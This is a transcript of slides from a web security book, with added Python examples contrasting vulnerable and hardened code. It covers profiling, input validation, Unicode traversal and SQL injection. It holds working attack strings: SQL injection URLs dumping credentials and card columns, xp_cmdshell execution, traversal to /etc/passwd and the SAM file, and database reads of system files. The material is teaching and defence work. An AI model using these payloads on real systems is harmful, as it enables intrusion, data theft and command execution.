HACKNOTES - Web Security - PowerPoint PPT Presentation (transcript)

1
HACKNOTES - Web Security
  • Mike Shema
  • McGraw-Hill/Osborne

2
PART I: Hacking Techniques & Defenses
  1. Web Hacking & Penetration Methodologies
  2. Critical Hacks & Defenses

3
1 Web Hacking & Penetration Methodologies
  • Threats and Vulnerabilities
  • Profiling the Platform
  • Profiling the Application
  • Summary

4
THREATS AND VULNERABILITIES
  • Vulnerabilities
  • The platform: Linux, Windows, Apache, Oracle
  • The application: programming errors
  • SQL injection
  • Session hijacking

5
PROFILING THE PLATFORM
  • Web Server: Apache, IIS, Netscape
  • Application Server: Tomcat (servlets), PHP, ASP.NET
  • Database: Oracle, MSSQL, DB2, Informix, Sybase

6
Port Scanning and Service Identification
  • Nmap

7
Port Scanning and Service Identification
  • Scanline: fast, but only performs SYN, ICMP and
    UDP scans

8
Port Scanning and Service Identification
  • Netcat, openssl

openssl s_client -connect website:443 -cipher EXPORT40
openssl s_client -connect website:443 -cipher NULL
openssl s_client -connect website:443 -cipher HIGH

A handshake that succeeds with -cipher EXPORT40 or -cipher NULL
shows the server still accepts export-grade or unencrypted cipher
suites; only the HIGH class should negotiate.
9
Vulnerability scanning
  • Nikto Nessus

10
Platform profile checklist
  1. Identify the server's role
  2. Determine the operating system and version
  3. Determine the operating system and application
    patch level
  4. Scan for open ports
  5. Record the web server type, patch level, and
    additional components
  6. Research known vulnerabilities.

11
PROFILING THE APPLICATION
  • The next step is to profile the actual web site
    by systematically cataloging all of its pages,
    functions, and parameters.
  • The goal is to identify common problems such as
    poor input validation, inadequate session
    handling, and other programming errors.

12
Enumerate the Directory Structure and Files
  • Indexes. The easy part is going through the
    application and recording each file name and its
    full path from the web root.
  • Teleport, wget
  • libwhisker's crawl function

13
Identify Authentication Mechanism
Keep in mind that challenge/response mechanisms
don't protect passwords with 100 percent security.

Anonymous    No authentication required.
HTTP Basic   Username and password are passed in a header as base64("username:password"). Base64 is an encoding, not encryption, so anyone who sees the request can read the credentials.
HTTP Digest  Username and password are passed in a header as an MD5 challenge/response.
HTTP NTLM    Username and password use Windows credentials passed in a challenge/response format.
Form-based   Username and password are entered in a form. The user receives some token (cookie value, session ID, etc.) that indicates success.
14
Identify Authorization Mechanism
  • Identify Authorization Tokens

User     URL
Matt     https://website/index.php?id=matt&isadmin=false&menu=basic
Allen    https://website/index.php?id=allen&isadmin=false&menu=full
George   https://website/index.php?id=george&isadmin=true&menu=basic
Scott    https://website/index.php?id=scott&isadmin=true&menu=full

Test requests, starting from Matt's session:
  • http://website/index.php?id=allen&isadmin=false&menu=basic
    If the request succeeds, then the application is
    vulnerable to horizontal privilege escalation.
  • http://website/index.php?id=george&isadmin=false&menu=basic
    If the request doesn't receive administrator
    rights, then user impersonation still works, but
    the server tracks authorization in a parameter
    other than id. Otherwise, the application performs
    the authorization check based on the username and
    is vulnerable to both horizontal and vertical
    privilege escalation.
  • http://website/index.php?id=matt&isadmin=true&menu=full
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    attack required manipulating multiple tokens, but
    the application still failed to enforce strong
    authorization checks.
  • http://website/index.php?id=matt&isadmin=false&menu=full
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    application doesn't perform any authorization
    checks after the user has authenticated.
  • http://website/index.php?id=matt&isadmin=true&menu=basic
    If the request succeeds, then the application is
    vulnerable to vertical privilege escalation. The
    application performs an authorization check on
    the isadmin parameter and provides functionality
    according to its value.

15
Protect Authorization
  • The best defense is to track as many user
    attributes on the server as possible.
  • Creating role-based access in a custom database
    table increases application overhead and
    maintenance; however, the security requirements
    of the application may require such a technique.
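The following is an added example, not code from the slides or the book: the five authorization-token tests from slide 14 run against two toy request handlers, one that trusts the id/isadmin/menu tokens in the URL and one that follows slide 15's advice and decides everything from a server-side session record. The user table, the handler functions and the session model are assumptions made for the illustration.

```python
# Added example (not from the HackNotes slides). Assumed: a server-side
# user table, a "session user" supplied by the framework, and the URLs
# from slide 14.
from urllib.parse import urlsplit, parse_qs

# Constructed sample data: what the server knows about each user.
USERS = {
    "matt":   {"isadmin": False, "menu": "basic"},
    "allen":  {"isadmin": False, "menu": "full"},
    "george": {"isadmin": True,  "menu": "basic"},
    "scott":  {"isadmin": True,  "menu": "full"},
}

def params(url):
    """Flatten ?a=b&c=d into a dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

def vulnerable_handler(session_user, url):
    """Trusts every token in the URL: id, isadmin and menu all come from the client."""
    p = params(url)
    return {"as_user": p.get("id"),
            "admin": p.get("isadmin") == "true",
            "menu": p.get("menu")}

def hardened_handler(session_user, url):
    """Only the server-side session decides who the user is and what they may do.
    An id token that disagrees with the session is refused; isadmin/menu are
    read from the server-side profile and the URL copies are ignored."""
    p = params(url)
    profile = USERS[session_user]
    if p.get("id") not in (None, session_user):
        return {"error": "forbidden"}     # attempted horizontal escalation
    return {"as_user": session_user,
            "admin": profile["isadmin"],
            "menu": profile["menu"]}

# The five test requests from slide 14, issued from Matt's session.
TESTS = {
    "horizontal":              "http://website/index.php?id=allen&isadmin=false&menu=basic",
    "impersonate admin":       "http://website/index.php?id=george&isadmin=false&menu=basic",
    "vertical (two tokens)":   "http://website/index.php?id=matt&isadmin=true&menu=full",
    "vertical (menu only)":    "http://website/index.php?id=matt&isadmin=false&menu=full",
    "vertical (isadmin only)": "http://website/index.php?id=matt&isadmin=true&menu=basic",
}

def escalation_found(handler, session_user="matt"):
    """Names of the tests in which the handler granted more than the session
    user legitimately has (another identity, admin rights, or the full menu)."""
    legit = USERS[session_user]
    found = []
    for name, url in TESTS.items():
        r = handler(session_user, url)
        if "error" in r:
            continue
        if (r["as_user"] != session_user
                or (r["admin"] and not legit["isadmin"])
                or (r["menu"] == "full" and legit["menu"] != "full")):
            found.append(name)
    return found

if __name__ == "__main__":
    print("vulnerable:", escalation_found(vulnerable_handler))   # all five names
    print("hardened:  ", escalation_found(hardened_handler))     # []
```

The hardened handler keeps the same URL shape (the application may still carry id/isadmin/menu for display), which is why it must actively compare the id token with the session rather than simply not reading it.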

16
Identify All Support Files
  • style sheets (.css)
  • IIS files that are interpreted by specific ISAPI
    (internet server application programming
    interface) filters, such as .htr, .htx, .idc ,
    .ida and .idq.
  • passwd.txt, global.asa
  • Nikto will identify these common files, but only
    in default locations.

17
Identify All Include Files
  • To identify an include file, search the HTML for
    the Server Side Include (SSI) tag:
  • Virtual
  • File
  • PHP
  • Log

<!--#include virtual="/html/include/header.inc" -->
<!--#include file="include/header.inc" -->
18
Protect Include Files
  • Always use the language's file suffix instead of
    .inc when naming include files, so the server
    executes the file rather than serving its source.
  • If you're using Apache::ASP, then you can either
    rename the files to .asp or modify the httpd.conf
    file.
  • The <FilesMatch> trick

<% This line will not be visible if the file suffix is .asp %>
<!-- This line will be visible regardless of the file suffix -->
19
Enumerate All Forms
  • The indicator of a form is the HTML <form> tag;
    however, the salient portions are the input
    type definitions.
  • Form-based authentication is also a primary
    target for brute-force password-guessing attacks.

<INPUT TYPE="hidden" NAME="sess_id" VALUE="">
<!-- from APBoard -->
<INPUT TYPE="hidden" NAME="postit" VALUE="TRUE">
<INPUT TYPE="hidden" NAME="insertinto" VALUE="1">
<INPUT TYPE="hidden" NAME="BoardID" VALUE="1">
<INPUT CLASS="button" TYPE="submit" NAME="new_topic" VALUE="Thema posten">
<INPUT CLASS="button" TYPE="submit" NAME="preview_topic" VALUE="Vorschau">
20
Enumerate All GET Parameters
  • Many applications track variables through URL
    parameters. The server sets these parameters
    based on user permission level, a user's action,
    a session ID, or a similar function.
  • Changing a parameter's value can point to the
    parameter's function or its relation to session
    tracking, or it can generate informational errors.
  • Each GET parameter should also be tested for
    input validation and SQL injection attacks.

http://website/main.asp?menu=viewprofile
Values to try for menu: viewprofile, user, welcome, admin, debug
21
Protect Parameters
  • If the application uses GET parameters to track
    values, then consider using POST requests more
    often.
  • The parameters of a POST request will not show up
    in a browser's history file or bookmarks. This
    limits disclosure only: a POST body is just as
    easy for the user to modify as a query string, so
    it is not an authorization control.

22
Identify Vectors for Directory Attacks
  • Directory attacks: traversal and listing
  • Applications that use templating techniques
  • Typical attack: the NULL (%00) character
  • Try this to bypass scripts that check for file
    extensions or automatically append characters to
    file names; the application sees the whole
    string, but the operating system stops at the
    NULL.
  • http://website/cgi-bin/bb-hostsvc.sh?HOSTSVC=www,website,com.cpu
  • http://website/servlet/webacc?User.html=index
  • http://website/ultraboard.pl?action=PrintableTopic&Post=42
  • ../../../../etc/passwd
  • ../../conf/httpd.conf
  • ../../../../boot.ini
  • ../../../../winnt/repair/sam

../../etc/passwd%00.html
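An added example, not part of the slides: the "append an extension, never check where the path points" pattern that slide 22's %00 and ../ tricks defeat, next to a resolver that decodes first, rejects NUL, canonicalises and then confirms the result is still under the document root. The web root, the request strings and the "what the C runtime would open" emulation are constructed for the illustration.

```python
# Added example (not from the HackNotes slides). WEB_ROOT, the request
# strings and the OS emulation below are assumptions for illustration.
import os
from urllib.parse import unquote

WEB_ROOT = "/var/www"   # assumed document root

class BadPath(Exception):
    pass

def what_the_os_opens(path):
    """Emulate the C runtime: collapse '..' and stop at the first NUL byte."""
    return os.path.normpath(path).split("\x00", 1)[0]

def naive_resolve(root, requested):
    """The pattern slide 22 targets: decode, append '.html' when it is
    missing, and never check where the result points."""
    path = unquote(requested)
    if not path.endswith(".html"):
        path += ".html"
    return os.path.join(root, path.lstrip("/"))

def safe_resolve(root, requested):
    """Decode, reject NUL, append the extension, canonicalise, then confirm
    the canonical path is still inside the root."""
    path = unquote(requested)
    if "\x00" in path:
        raise BadPath("NUL byte in path")
    if not path.endswith(".html"):
        path += ".html"
    root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root, path.lstrip("/")))
    if os.path.commonpath([root, full]) != root:
        raise BadPath("path escapes web root")
    return full

def classify(requested):
    """(what the naive code would open, what the safe code does) for one request."""
    naive = what_the_os_opens(naive_resolve(WEB_ROOT, requested))
    try:
        safe = safe_resolve(WEB_ROOT, requested)
    except BadPath as e:
        safe = "REJECTED: " + str(e)
    return naive, safe

if __name__ == "__main__":
    for req in ("index",
                "../../etc/passwd%00.html",               # slide 22's NULL trick
                "%2e%2e%2f%2e%2e%2fetc%2fpasswd",         # URL-encoded traversal
                "../../conf/httpd.conf%00"):
        print(req, "->", classify(req))
```

Checking the extension on the decoded string is not enough by itself: the NUL check and the realpath containment test are what stop the two attacks, and they only work because decoding happens before every check.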
23
Identify Areas that Provide File Upload Capability
  • File upload introduces several threats to the
    application
  • Malicious Content
  • File Overwrite
  • Denial of Service

24
Identify Errors
  • Two steps:
  • Simply try to generate some errors in the
    application: insert garbage characters, delete
    parameters, insert punctuation.
  • Identify what types of errors are generated on
    the server and how they are displayed to the user.

Did it return the server's default HTTP 500 message?
Is it a customized error page?
Does an error return a custom page, but with an HTTP 200 status?
What information does the error contain?
Can you identify path information?
What about internal variables or references to other files?
Is the error related to SQL queries?
25
Protect Error Messages
  • Errors can be caught in two locations:
  • The web or application server
  • Change the content of these pages so that they do
    not include any server or application
    information.
  • The application itself
  • Make sure that the application has proper
    error-handling routines that default to a simple,
    innocuous error message.

26
Determine Which Pages Require SSL
  • Replace all of the https:// references with
    http:// and see if the application still serves
    the page.
  • The server and application should be designed to
    ensure that sensitive files are transmitted via
    SSL.

27
Application Profile Checklist
Step
Harvest the web site
Enumerate the directory structure and files
Identify authentication mechanism
Identify authorization mechanism
Identify all support files
Identify all include files (.inc, .js, global.asa)
Enumerate all forms (type=hidden, type=password)
Enumerate all GET parameters (?name1=value1)
Enumerate the effect of absent GET parameters (omit name1=value1)
Identify vectors for directory traversal attacks
Identify areas that provide file upload capability
Identify errors
Determine which pages require SSL
28
SUMMARY
  • In order to fully vet the security of an
    application, it must first be fully profiled.
  • This basically involves gathering as much
    information as possible about the platform and
    the application.
  • A good profile of the application and knowledge
    of SQL can turn an innocuous error into a severe
    exploit.

29
2 Critical Hacks & Defenses
  • Generic Input Validation
  • Character Encoding
  • Alternate Request Methods
  • SQL Injection
  • Cross-site Scripting
  • Token Analysis
  • Session Attacks
  • XML-Based Services
  • Fundamental Application Defenses
  • Input Validation
  • Summary

30
GENERIC INPUT VALIDATION
  • Common input validation tests

Character                       URL escape   Comments
NULL (empty)                    (empty)      Remove the parameter from the URL or POST request. Use this to check error handling.
NULL                            %00          Insert a NULL character within a parameter or at the end of a string. Use %00 to bypass file-name validation routines (an application may allow a variable to contain NULL characters, but the underlying operating system uses the NULL to terminate a string).
Line feed, carriage return      %0a, %0d     Use these for arbitrary command execution, command separation, and parsing errors.
7-bit maximum, 8-bit maximum    %7f, %ff     Use these to test the application's handling of potential byte-field overflows.
Extended ASCII (value + 0x80)   %c1, %e1     Use these to test for potential wraparound errors. Add 0x80 (128) to any ASCII character and see what the application accepts and displays.
'                               %27          Use this to test for SQL injection vulnerabilities.
;                               %3b          Use this for command execution and command separation on Unix-based systems.
31
GENERIC INPUT VALIDATION
  • Common input validation tests (cont.)

Character     URL escape                   Comments
|             %7c                          Use this for command execution and redirection on Unix-based systems.
&, &&         %26, %26%26                  Use this for command execution (background a process) on Unix-based systems. Double it (&&) for Windows systems.
( ) + -- =    %28 %29 %2b %2d%2d %3d       Use these SQL statement components to craft SQL injection attacks.
../           %2e%2e%2f                    Use this for directory traversal attacks.
<script>      %3cscript%3e                 Use this for cross-site scripting tests in fields that the application redisplays to the user.
Underflow     Varies                       Enter too few characters for the field.
Overflow      Varies                       Enter too many characters for the field.
32
Common Vectors
Consider these vectors as well:
GET requests, POST requests, session cookies, stateful cookies,
HTTP headers (User-Agent, Host, Content-Type, Referer), WebDAV options

Request portion   Attack possibilities
GET               What happens if the request is submitted with a POST? What about other verbs? (PUT, DELETE, TRACE, etc.)
/menu.cgi         /. (possible directory listing); /menu.cgi%00 (possible source disclosure); /menu.cgi.bak
?foo=bar          Replace bar with any item
HTTP/1.1          HTTP/1.0; HTTP/2.0 (invalid protocol version in a request line)
Host: website     Host: localhost; Host: aaaaaa... (large number of letters)
Example input validation attack vectors
33
Source Disclosure
  • Certain input validation attacks manipulate the
    CGI's file name in order to cause its source to
    be displayed in a user's browser.
  • Java-based server engines seem to be most
    vulnerable to this type of validation attack.
  • /foo.jsP
  • /foo.js%70
  • /%3f.jsp (directory listing)
  • /foo.asp::$DATA
  • /foo.asp.html

34
CHARACTER ENCODING
  • URL Encoding (Escaped Characters)
  • Unicode

Alphanumeric   a-z A-Z 0-9
Reserved       ; / ? : @ & = + $ ,
Marks          - _ . ! ~ * ' ( )
Space          0x20
Delimiters     < > # % "
Unwise         { } | \ ^ [ ] `

UTF-8 two-byte form:
Mask     1 1 0 0 0 0 b7 b6   1 0 b5 b4 b3 b2 b1 b0
         ---- first byte ---- ---- second byte ----
Example  / = 0 0 1 0 1 1 1 1 (0x2F)
             b7 b6 b5 b4 b3 b2 b1 b0
Result   1 1 0 0 0 0 0 0 (C0)   1 0 1 0 1 1 1 1 (AF)   in URL: %c0%af
This is an "overlong" encoding: a strict UTF-8 decoder rejects it,
but a decoder that only applies the mask turns it back into "/".

Microsoft Bulletin MS00-078 (IIS "Web Server Folder Traversal")
http://website/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
Parsed by IIS:
http://website/scripts/../../winnt/system32/cmd.exe?/c+dir
Recorded in IIS logs (the raw bytes C0 AF shown as Latin-1):
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir
35
Some Useful Unicode-Encoded Characters
Character   ASCII (hex)   Unicode representation (1:1)   Unicode multibyte representations
/           0x2F          %C0%2F                         %C0%AF
\           0x5C          %C0%5C                         %C1%1C, %C1%9C
<           0x3C          %C0%3C                         %C0%BC
>           0x3E          %C0%3E                         %C0%BE
'           0x27          %C0%27                         %C0%A7
(           0x28          %C0%28                         %C0%A8
)           0x29          %C0%29                         %C0%A9
,           0x2C          %C0%2C                         %C0%AC
|           0x7C          %C0%7C                         %C0%FC
*           0x2A          %C0%2A                         %C0%AA
.           0x2E          %C0%2E                         %C0%AE
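An added example, not from the slides: the two-byte mask of slide 34 implemented both ways, a decoder that applies nothing but the mask (a simplified model of the lenient parsing the IIS bulletin describes, not IIS's actual code) and Python's strict decoder, plus the "filter before decode" ordering mistake that let ..%c0%af.. through a ../ check. The request paths are constructed.

```python
# Added example (not from the HackNotes slides). lenient_utf8 is a
# simplified model of mask-only decoding, assumed for the illustration.
from urllib.parse import unquote_to_bytes

def overlong2(ch):
    """Two-byte form from slide 34: 110000b7b6 10b5b4b3b2b1b0. For a 7-bit
    character this is an 'overlong' sequence that strict UTF-8 forbids."""
    c = ord(ch)
    if c >= 0x80:
        raise ValueError("only 7-bit characters have an overlong two-byte form")
    return bytes([0xC0 | (c >> 6), 0x80 | (c & 0x3F)])

def lenient_utf8(data):
    """Apply the mask and nothing else: no overlong check, and the second
    byte is not even required to be a continuation byte. This turns %c0%af
    into '/' and %c1%1c into '\\' (the slide 35 table)."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))); i += 2
        else:
            out.append("\ufffd"); i += 1
    return "".join(out)

def strict_utf8(data):
    """Python's decoder: overlong and malformed sequences are rejected."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None

def filter_then_decode(url_path):
    """Wrong order: the traversal check sees '..%c0%af..' and passes it."""
    if "../" in url_path or "..\\" in url_path:
        raise ValueError("traversal blocked")
    return lenient_utf8(unquote_to_bytes(url_path))

def decode_then_filter(url_path):
    """Right order: strict-decode to one canonical string, then check it."""
    text = strict_utf8(unquote_to_bytes(url_path))
    if text is None or "../" in text or "..\\" in text:
        raise ValueError("traversal blocked")
    return text

def blocked(fn, url_path):
    """True if fn refuses the path."""
    try:
        fn(url_path)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    attack = "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe"
    print(overlong2("/").hex(), overlong2("\\").hex())      # c0af c19c
    print(filter_then_decode(attack))                        # ../../ survives
    print(blocked(decode_then_filter, attack))               # True
```

The general rule the example demonstrates is canonicalise once, with a decoder that rejects ambiguous encodings, and only then apply any string-based check.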
36
ALTERNATE REQUEST METHODS
  • SPIKE proxy
  • http://www.immunitysec.com/resources-freesoftware.shtml
  • GET, POST, BROWSE, CONNECT, COPY, DELETE, HEAD,
    LOCK, MKCOL, MOVE, OPTIONS, PROPFIND, PROPPATCH,
    PUT, SEARCH, TRACE, and UNLOCK.

37
SQL INJECTION
URL = HTTP.GetFromUser()
user_id = URL.parameter("user_id")
password = URL.parameter("password")
query = "SELECT name FROM userlist WHERE uid='" + user_id +
        "' AND pwd='" + password + "'"
database.connect()
result = database.execute(query)
if result
    HTTP.Send("Login successful. Welcome, " + result)
    IsAuthenticated = true
else
    HTTP.Send("User ID or password is incorrect.")
    IsAuthenticated = false
end if
if IsAuthenticated
    HTTP.Send(MainMenu)
end if

https://website/login.cgi?user_id=dcooper&password=diane
https://website/login.cgi?user_id=dcooper'%20--
38
SELECT Statement Manipulation
  • https://website/login.cgi?user_id=dcooper&password='%20OR%20''%3d'
  • https://website/login.cgi?user_id=dcooper&password=foo'%20OR%201%3d1
  • https://website/login.cgi?user_id='%20OR%20''%3d'&password='%20OR%20''%3d'
  • https://website/login.cgi?user_id=%25'--

SELECT name FROM userlist WHERE uid='dcooper' AND pwd='' OR ''=''
SELECT name FROM userlist WHERE uid='dcooper' AND pwd='foo' OR 1=1'
SELECT name FROM userlist WHERE uid='' OR ''='' AND pwd='' OR ''=''
SELECT name FROM userlist WHERE uid='%'-- AND pwd=''

AND binds more tightly than OR, so the first statement reads
(uid='dcooper' AND pwd='') OR (''='') and returns every row. The
second form leaves the application's own closing quote dangling after
1=1; it only parses if that quote is commented out (--) or absorbed by
the injected string.
39
Retrieve Arbitrary Data with SELECT plus UNION
  • SELECT value(s) FROM table WHERE clause_false
    UNION ALL SELECT value(s) FROM other_table WHERE
    clause_true

https://website/login.cgi?user_id=foo&password='UNION%20ALL%20SELECT%20uid,pwd%20FROM%20userlist%20WHERE%20''%3d'

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT uid, pwd FROM userlist WHERE ''=''

https://website/login.cgi?user_id=foo&password=%27UNION%20ALL%20SELECT%20first%5fname%2clast%5fname%2cccard%20FROM%20store%20WHERE%20%27%27%3d%27%27

SELECT name FROM userlist WHERE uid='foo' AND pwd='' UNION ALL SELECT first_name,last_name,ccard FROM store WHERE ''=''

SELECT name FROM userlist WHERE uid='foo' AND pwd='bar' UNION ALL SELECT first_name, last_name, ccard FROM store WHERE 1=1

Note that the number of columns (and, on most databases, their types)
in the UNIONed SELECT must match the original statement; the
one-column SELECT name above must be padded, or the injected column
list reduced, before the database accepts the query.
40
Use INSERT to Modify Data
  • INSERT INTO user (User,Password) VALUES
    ('albert','camus')

https://website/login.cgi?user_id=&password=%27;INSERT%20INTO%20userlist%20%28uid%2cpassword%29%20VALUES%20%28%27albert%27%2c%27camus%27%29--

SELECT name FROM userlist WHERE uid='' AND pwd='';INSERT INTO userlist (uid,password) VALUES ('albert','camus')--'

This relies on the database and its driver executing stacked
statements (Microsoft SQL Server does; many MySQL client APIs refuse a
second statement in one call).
41
Salient Information for Common Databases
Server                Default Accounts                                                                          View Users                                                                                                    Useful Variables
Microsoft SQL Server  sa / <blank>                                                                              EXEC master..sp_who2; EXEC master..xp_loginconfig; SELECT * FROM sysusers; SELECT * FROM syslogins           EXEC xp_msver; @@servername; @@version
MySQL                 root / <blank>; monty / some_pass                                                         SELECT host,user,password FROM user                                                                           SHOW VARIABLES; @@version
Oracle                internal / oracle; oracle / oracle; Scott / tiger; sys / Change_on_install; system / manager   SELECT A.USERNAME, A.PASSWORD FROM SYS.DBA_USERS A                                                       SHOW PARAMETERS
PostgreSQL            postgres / <locked> (must be defined)                                                     SELECT * FROM pg_shadow; SELECT * FROM pg_group
42
Common SQL Injection String
Raw String      URL Encoded Version                   Effect
'               %27                                   Initial test. If this generates an error, then the application is vulnerable to SQL injection.
%               %25 (double-encoded: %2525)           Represents a wildcard. Can be used to retrieve multiple rows as opposed to a single value.
';--  ;--       %27%3b%2d%2d  %3b%2d%2d               SQL comment. Use this to truncate a statement so that further SQL syntax within the statement is ignored.
' OR ''='       %27%20OR%27%27%3d%27                  Creates a true statement.
OR 1=1          %20OR%201%3d1%20                      Creates a true statement. Use this when the query does not have single quote (') delimiters.
foo)            foo%29                                May generate errors in Oracle-based applications.
43
SQL Injection Countermeasures
  • Use strongly typed variables and database column
    definitions.
  • Assign query results to a strongly typed
    variable.
  • Limit data lengths.
  • Avoid creating queries via string concatenation.
  • Apply data separation and role-based access
    within the database.

http://website/vote/analysis.asp?voteid=@@version
Microsoft OLE DB Provider for SQL Server error '80040e57'
Arithmetic overflow error converting nvarchar to data type numeric.
/vote/analysis.asp, line 19

SELECT something FROM table WHERE variable=

The error shows that @@version was evaluated by the database and its
string result compared against a numeric column: the parameter is
concatenated straight into the query.
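An added example that is not code from the slides: the login query of slide 37 built by string concatenation, the tautology, comment and UNION injections of slides 38-39 run against it in an in-memory SQLite database, and the parameterised form that the countermeasures above ("avoid creating queries via string concatenation") call for. The table contents are constructed sample data; the UNION payload concatenates uid and pwd into one column so that the column count matches the original SELECT, which most databases (SQLite included) require.

```python
# Added example (not from the HackNotes slides). The userlist rows are
# constructed sample data.
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE userlist (uid TEXT, pwd TEXT, name TEXT);
        INSERT INTO userlist VALUES ('dcooper', 'diane', 'Dale Cooper');
        INSERT INTO userlist VALUES ('admin', 's3cret', 'Administrator');
    """)
    return db

def login_vulnerable(db, user_id, password):
    """Slide 37's pseudocode: the query is assembled from raw request values."""
    query = ("SELECT name FROM userlist WHERE uid='" + user_id +
             "' AND pwd='" + password + "'")
    return [row[0] for row in db.execute(query)]

def login_safe(db, user_id, password):
    """Placeholders: the values are bound as data and never parsed as SQL,
    whatever quotes, comments or keywords they contain."""
    query = "SELECT name FROM userlist WHERE uid=? AND pwd=?"
    return [row[0] for row in db.execute(query, (user_id, password))]

# Injection strings from slides 38-39, decoded from their URL-encoded form.
TAUTOLOGY  = ("dcooper", "' OR ''='")      # ... AND pwd='' OR ''=''
COMMENT    = ("dcooper'--", "anything")    # ... uid='dcooper'-- AND pwd='anything'
UNION_DUMP = ("foo", "' UNION ALL SELECT uid || ':' || pwd FROM userlist WHERE ''='")

def run_all(login):
    """Run each payload through one login implementation on a fresh database."""
    db = make_db()
    return {
        "tautology": login(db, *TAUTOLOGY),
        "comment":   login(db, *COMMENT),
        "union":     login(db, *UNION_DUMP),
    }

if __name__ == "__main__":
    print("vulnerable:", run_all(login_vulnerable))
    # tautology -> both names, comment -> Dale Cooper, union -> every uid:pwd
    print("safe:      ", run_all(login_safe))
    # every payload -> []
```

The tautology result illustrates the precedence point behind slide 38: AND binds before OR, so `uid='dcooper' AND pwd='' OR ''=''` matches every row, not just Cooper's.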
44
Microsoft SQL Server
  • Insert a single quote (') into URL parameters and
    then examine the output, HTML source, or even the
    URL parameters for a tell-tale sign.
  • In addition to the slew of attacks that can be
    performed against any SQL-based database, MSSQL
    Server contains a set of very powerful and
    dangerous commands.

EXEC master..xp_cmdshell 'command'
https://website/vuln.cgi?param=';xp_cmdshell+'ipconfig/all'--
45
High-Risk Stored Procedures in MSSQL
Stored Procedure                        Description
sp_validatelogins                       Enumerates users who may still access the database but are no longer part of a group or domain known to the database.
sp_who2 'user'                          Enumerates database user information. Note that these are users with access to the SQL database itself; application users must be gathered from the custom tables created for the application.
xp_loginconfig                          Enumerates login information, login mode, and default user.
xp_msver                                Lists database version and operating system information.
xp_ntsec_enumdomains                    Enumerates domains present on the network.
xp_regread <rootkey>,<key>,<value>      Reads a registry key from the hive.
xp_servicecontrol <action>,<service>    Performs an action (START or STOP) on a Windows service.
xp_terminate_process <PID>              While it does not provide a simple method for identifying a process name, this can quickly lead to a denial of service.
46
Useful Objects and Variables
Variables (SELECT @@variable)
@@language          Name of the language currently in use.
@@microsoftversion  Numeric value that represents the version and patch level.
@@servername        Host name of the database.
@@servicename       Name of the Windows service under which the database is running.
@@version           Date, version, and processor type. Use xp_msver to extract more information.

System Table Objects (SELECT * FROM table)
syscolumns    Every column in every table and view, plus a row for each stored-procedure parameter.
sysfiles      File name and path for the current database and its log file.
sysobjects    Every object contained in the database.
systypes      Default and user-defined data types.
sysusers      All users who can manipulate the database.

Master Database Tables (SELECT * FROM master..table)
sysconfigures  Current database configuration settings.
sysdevices     Devices used for database, logs, and temporary files.
syslogins      Information for each user permitted to access the database.
sysservers     All peers that the server can access as an OLE DB server.
47
Oracle
Informational Oracle parameters
Parameter       Description
control_files   Example: E:\oracle\ora92\orcl\control01.ctl, E:\oracle\ora92\orcl\control02.ctl, E:\oracle\ora92\orcl\control03.ctl
db_name         Example: orcl
mts_service     Example: orcl
user_dump_dest  Example: E:\oracle\admin\orcl\udump
utl_file_dir    Default: <blank>. The directory in which files are written with the UTL_FILE package.

show parameters control_files;

CREATE DIRECTORY somedir AS '/path/to/dir';
CREATE TABLE foo (bar varchar2(20))
  ORGANIZATION EXTERNAL (TYPE oracle_loader DEFAULT DIRECTORY somedir
                         LOCATION ('somefile.dat'));

DECLARE
  fh UTL_FILE.FILE_TYPE;
BEGIN
  fh := UTL_FILE.fopen('/some/dir', 'file.name', 'W');  -- write
  UTL_FILE.PUTF(fh, 'somedata');
  UTL_FILE.FCLOSE(fh);
END;
48
MySQL Read from the File System
mysql> CREATE TABLE foo (bar TEXT);
Query OK, 0 rows affected (0.02 sec)
mysql> LOAD DATA INFILE '/etc/passwd' INTO TABLE foo;
Query OK, 27 rows affected (0.02 sec)
Records: 27  Deleted: 0  Skipped: 0  Warnings: 0
mysql> SELECT * FROM foo;
bar
---------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
mike:x:500:500:mike:/home/mike:/bin/bash
mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash
postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash
...

https://website/vuln.cgi?param=%27;CREATE+TABLE+foo%28bar+TEXT%29
https://website/vuln.cgi?param=%27;LOAD+DATA+INFILE+%27%2fetc%2fpasswd%27+INTO+TABLE+foo
https://website/vuln.cgi?param=%27;SELECT+%2a+FROM+foo
49
MySQL Write to the File System
Create a DoS by taking up disk space:
SELECT * FROM employees INTO OUTFILE '/tmp/foo'

https://website/vuln.cgi?param=%27;SELECT+%2a+FROM+employees+INTO+OUTFILE+%27%2ftmp%2f..%08%27

The file name ..%08 (two dots followed by a backspace) makes the
dump look like the parent directory in a plain listing; cat -tve
shows the control character:

melnibone$ ls -la /tmp
drwxrwxrwx  8 root  root  4096 jan 16 16:28 .
drwxrwxrwx 19 root  adm   4096 jan 16 14:03 ..
drwxrwxrwx  1 mysql mysql 1269 jan 16 16:28 ..
melnibone$ ls -la /tmp | cat -tve
drwxrwxrwx  8 root  root  4096 jan 16 16:28 ./$
drwxrwxrwx 19 root  adm   4096 jan 16 14:03 ../$
drwxrwxrwx  1 mysql mysql 1269 jan 16 16:28 ..^H$
50
PostgreSQL File Read/Write Access with COPY
test=# CREATE TABLE foo (bar TEXT);
CREATE
test=# COPY foo FROM '/etc/passwd';
COPY
test=# SELECT * FROM foo;
 bar
---------------------------------------------------------------------
 root:x:0:0:root:/root:/bin/bash
 mike:x:500:500:mike:/home/mike:/bin/bash
 mysql:x:78:78:MySQL server:/var/lib/mysql:/bin/bash
 postgres:x:79:79:system user:/var/lib/pgsql:/bin/bash
 ...
(27 rows)
